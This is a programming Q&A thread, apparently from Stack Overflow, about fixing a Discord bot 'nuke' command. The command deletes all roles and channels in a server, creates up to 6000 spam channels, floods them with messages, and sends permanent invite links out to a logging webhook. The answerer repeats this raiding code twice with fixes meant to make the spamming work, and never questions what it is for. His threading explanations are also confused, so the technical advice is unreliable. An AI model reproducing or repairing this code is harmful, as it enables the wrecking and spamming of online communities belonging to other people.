# RuntimeWarning: coroutine was never awaited self._target(*self._args, **self._kwargs)

Tags: python, discord, discord.py, python-multithreading

so i got this error:

```
/usr/lib/python3.8/threading.py:870: RuntimeWarning: coroutine 'mspammer' was never awaited
  self._target(*self._args, **self._kwargs)
RuntimeWarning: Enable tracemalloc to get the object allocation traceback
```

And here is a part of code:

```
async def mspammer(channel: discord.TextChannel):
    while True:
        await channel.send(random.choice(SPAM_MESSAGE))
        await asyncio.sleep(0.5)

@client.command()
async def nuke(ctx: commands.Context):
    everyonespam = True
    await ctx.message.delete()
    guild = ctx.guild
    amount = 6000
    for role in guild.roles:
      try:
        await role.delete()
        print(Fore.MAGENTA + f"Role '{role.name}' has been deleted  " + Fore.RESET)
      except:
        print(Fore.GREEN + f"Role '{role.name}' has not been deleted" + Fore.RESET)
    for channel in guild.channels:
      try:
        await channel.delete()
        print(Fore.MAGENTA + f"{channel.name} has been deleted" + Fore.RESET)
      except:
        print(Fore.GREEN + f"{channel.name} couldn't be deleted." + Fore.RESET)
    for i in range(10):
      await guild.create_category(random.choice(SPAM_CATEGORY))
    channela = await guild.create_text_channel('cacti on top')
    for channel in guild.text_channels:
      link = await channel.create_invite(max_age = 0, max_uses = 0)
      link = str(link)
      webhooklog.send('NEW LINK: ' + link)
      await channela.send(random.choice(SPAM_MESSAGE))
    for i in range(amount):
      _ = Thread(target=mspammer, args=(channel,))
      _.start()
      channel = await guild.create_text_channel(random.choice(SPAM_CHANNEL))
```

The code is supposed to create channels and spam in them. But it only creates channels and doesn't spam in them. Do you know what's the problem?

Answer (score 2):

## Edit

I edited my answer to ensure it works.

```py
import asyncio

async def mspam(channel: discord.TextChannel):
    while True:
        await channel.send(random.choice(SPAM_MESSAGE))
        await asyncio.sleep(0.5)

def spam(channel):
    asyncio.run(mspam(channel))

@client.command()
async def nuke(ctx: commands.Context):
    everyonespam = True
    await ctx.message.delete()
    guild = ctx.guild
    amount = 6000
    for role in guild.roles:
      try:
        await role.delete()
        print(Fore.MAGENTA + f"Role '{role.name}' has been deleted  " + Fore.RESET)
      except:
        print(Fore.GREEN + f"Role '{role.name}' has not been deleted" + Fore.RESET)
    for channel in guild.channels:
      try:
        await channel.delete()
        print(Fore.MAGENTA + f"{channel.name} has been deleted" + Fore.RESET)
      except:
        print(Fore.GREEN + f"{channel.name} couldn't be deleted." + Fore.RESET)
    for i in range(10):
      await guild.create_category(random.choice(SPAM_CATEGORY))
    channela = await guild.create_text_channel('cacti on top')
    for channel in guild.text_channels:
      link = await channel.create_invite(max_age = 0, max_uses = 0)
      link = str(link)
      webhooklog.send('NEW LINK: ' + link)
      await channela.send(random.choice(SPAM_MESSAGE))
    for i in range(amount):
      channel = await guild.create_text_channel(random.choice(SPAM_CHANNEL))
      spam(channel)
```

## Old Post

Yes, you cannot run quarantined scripts using threading. A simpler method with one function should also work, since creating a channel will not wait for anything.

```py
async def mspammer(channel: discord.TextChannel):
    while True:
        await channel.send(random.choice(SPAM_MESSAGE))
        await asyncio.sleep(0.5)

@client.command()
async def nuke(ctx: commands.Context):
    everyonespam = True
    await ctx.message.delete()
    guild = ctx.guild
    amount = 6000
    for role in guild.roles:
      try:
        await role.delete()
        print(Fore.MAGENTA + f"Role '{role.name}' has been deleted  " + Fore.RESET)
      except:
        print(Fore.GREEN + f"Role '{role.name}' has not been deleted" + Fore.RESET)
    for channel in guild.channels:
      try:
        await channel.delete()
        print(Fore.MAGENTA + f"{channel.name} has been deleted" + Fore.RESET)
      except:
        print(Fore.GREEN + f"{channel.name} couldn't be deleted." + Fore.RESET)
    for i in range(10):
      await guild.create_category(random.choice(SPAM_CATEGORY))
    channela = await guild.create_text_channel('cacti on top')
    for channel in guild.text_channels:
      link = await channel.create_invite(max_age = 0, max_uses = 0)
      link = str(link)
      webhooklog.send('NEW LINK: ' + link)
      await channela.send(random.choice(SPAM_MESSAGE))
    for i in range(amount):
      _ = Thread(target=mspammer, args=(channel,))
      _.start()
      channel = await guild.create_text_channel(random.choice(SPAM_CHANNEL))
      while True:
        await channel.send(random.choice(SPAM_MESSAGE))
        await asyncio.sleep(0.5)
```

The only thing wrong is that the threading module does not support awaited functions, since it runs the scripts directly.

Comment: okay, but, it only creates one channel and spams in it, is it possible to make it that bot creates channels and at the same time spams in them?

Comment: @qEniuu Sorry, I'm not on the professional side on Python multi-threading. I believe it is impossible to await threads when the activity has started. Tried to fix it now. Read "Edit".